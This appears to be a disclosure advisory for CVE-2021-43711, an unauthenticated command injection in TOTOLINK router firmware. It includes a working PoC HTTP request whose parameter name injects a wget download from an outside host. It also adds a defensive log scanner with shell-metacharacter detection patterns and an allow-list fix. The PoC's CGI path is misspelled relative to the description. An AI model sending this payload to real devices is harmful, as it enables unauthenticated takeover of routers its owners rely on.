
CVE-2021-43711

Command injection of ToTolink series

Preface

Last year I found several command injection problems in the TOTOLINK EX200, but the vulnerability is not limited to the EX200. Because the manufacturer reuses the same embedded firmware across its product line, the vulnerability is present on every device that runs the same type of firmware.

Over the coming period I will sort out the devices that carry CVE-2021-43711-type vulnerabilities and the firmware versions affected.

This vulnerability is trivial to exploit and requires no authentication.

List of affected devices (updating)

A fellow researcher has compiled all the affected device models below, and the CVE ID was issued for them.

1. TOTOLINK EX200 http://totolink.net/home/menu/detail/menu_listtpl/download/id/144/ids/36.html
   Link: http://totolink.net/data/upload/20210428/7979e841521515eb83b45aacf5b67f9a.zip
   Firmware: TOTOLINK_CS133E-EN_EX200_WX005_8196E_SPI_4M32M_V4.0.3c.7646_B20201211_ALL.web

2. TOTOLINK A800R http://totolink.net/home/menu/detail/menu_listtpl/download/id/166/ids/36.html
   Link: http://totolink.net/data/upload/20201223/5425d375a083ea6952abc47ee7cc4a6b.zip
   Firmware: V4.1.2cu.5137_B20200730

3. TOTOLINK A300RU http://totolink.net/home/menu/detail/menu_listtpl/download/id/168/ids/36.html
   Link: http://totolink.net/data/upload/20210111/c5bd257ad1a977679618faee0526bf0c.zip
   Firmware: V5.9c.5185_B20201128

Description

The downloadFile.cgi binary has a command injection vulnerability in its handling of GET parameters: the parameter name is passed to a shell unsanitised, so a crafted parameter name gives unauthenticated command execution.

POC

```http
GET /cgi-bin/downloadFlile.cgi?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
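As an added defender-side example (not part of the original advisory or of TOTOLINK's code): a small Python scanner that reads web-server access-log lines, percent-decodes every parameter name in requests under /cgi-bin/, and flags names that contain shell metacharacters or the `${IFS}` whitespace substitute used in the PoC above. It also carries the allow-list check a CGI handler should apply to parameter names before anything reaches a shell; that check is deliberately stricter than the log-side detection. The log lines, addresses and user agents are constructed for the example.

```python
"""Detector for the downloadFile.cgi request pattern described above.

Added example, not part of the original advisory. Access-log lines,
addresses and user agents below are constructed for illustration.
"""
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Shell metacharacters and the ${IFS} whitespace substitute seen in the PoC.
# None of these has any business in a CGI parameter name.
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{IFS\}|\$IFS")

# Allow-list for parameter names on the CGI side: identifier characters only.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_]{1,64}$")

# Request line inside a combined-format access-log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def split_query_names(query: str) -> List[str]:
    """Return the percent-decoded parameter names of a raw query string.

    Splitting on '&' and then on the first '=' is what a naive CGI parser
    does, so a payload hidden in a name shows up here exactly as the CGI
    sees it. Decoding happens after the split so an encoded '&' or '='
    cannot move the field boundaries.
    """
    names = []
    for pair in query.split("&"):
        if pair:
            names.append(unquote(pair.split("=", 1)[0]))
    return names


def is_safe_name(name: str) -> bool:
    """Allow-list check a CGI should apply before a name reaches any shell."""
    return SAFE_NAME.match(name) is not None


def classify_request(target: str) -> Dict[str, object]:
    """Inspect one request target (path plus query string).

    A request is suspicious when it is aimed at a CGI under /cgi-bin/ and at
    least one decoded parameter name carries shell metacharacters.
    """
    parts = urlsplit(target)
    bad = [n for n in split_query_names(parts.query) if SHELL_META.search(n)]
    return {
        "path": parts.path,
        "bad_names": bad,
        "suspicious": parts.path.startswith("/cgi-bin/") and bool(bad),
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return a verdict for every log line whose request looks like an injection attempt."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m is None:
            continue
        verdict = classify_request(m.group("target"))
        if verdict["suspicious"]:
            verdict["line"] = line
            hits.append(verdict)
    return hits


# Constructed access-log sample: the first line mirrors the advisory's PoC,
# the second is a percent-encoded variant, the last two are benign traffic.
SAMPLE_LOG = [
    '192.168.0.111 - - [11/Dec/2021:10:00:01 +0000] "GET /cgi-bin/downloadFile.cgi'
    '?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '192.168.0.111 - - [11/Dec/2021:10:00:02 +0000] "GET /cgi-bin/downloadFile.cgi'
    '?%3Bid%3B=x HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '192.168.0.20 - - [11/Dec/2021:10:00:03 +0000] "GET /cgi-bin/downloadFile.cgi'
    '?file=config.dat HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.168.0.20 - - [11/Dec/2021:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("injection attempt:", hit["path"], hit["bad_names"])
```

The scanner decodes names only after splitting the query, so an encoded `;` is caught without letting an encoded `&` or `=` change the field layout. On the device side the fix is the allow-list in `is_safe_name`, applied to every parameter name before the CGI does anything with it; a name that is not identifier-like should simply be rejected.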